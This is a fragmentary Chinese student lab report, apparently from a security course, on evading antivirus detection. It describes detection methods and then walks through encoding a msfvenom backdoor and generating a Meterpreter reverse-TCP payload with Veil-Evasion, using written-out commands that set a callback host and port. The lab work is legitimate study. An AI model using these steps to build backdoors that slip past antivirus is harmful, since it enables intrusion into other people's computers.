标签:org msf 编码 kali 哪些 命令 基于 地址 别人
1.基于特征码的检测,2.启发式恶意软件检测,3.基于行为的恶意软件检测。
让病毒不被杀毒软件杀掉。
1.改变特征码 2.加壳
这次实验让我深入理解了免杀原理,也让我知道了原来以前认为很安全的杀毒软件业并没有那么可靠,因为有很多方法可以实现免杀,给我们的电脑带来风险。
实战中不可能那么容易在别人的电脑中植入一个后门程序。
实验的局限性很大。
把上一次实验用msfvenom生成的后门放入http://www.virscan.org/进行检测
对后门程序进行一次重新编码,再次进行检测
我们再将后门程序进行编码十次,然后再检测
可见,编码对免杀没啥用。
启动evail-evasion,设置好回连的IP地址和端口号后,生成后门文件。
命令行中输入veil,
后在veil中输入命令use evasion
依次输入如下命令:
use c/meterpreter/rev_tcp.py
set LHOST 192.168.81.128
set LPORT 5331
generate
可执行文件的文件名(palyload5331)
通过命令找到文件
扫描结果
首先,在Kali上使用命令生成一个c语言格式的Shellcode数组
标签:org msf 编码 kali 哪些 命令 基于 地址 别人
原文地址:https://www.cnblogs.com/dd1174751354/p/8794452.html
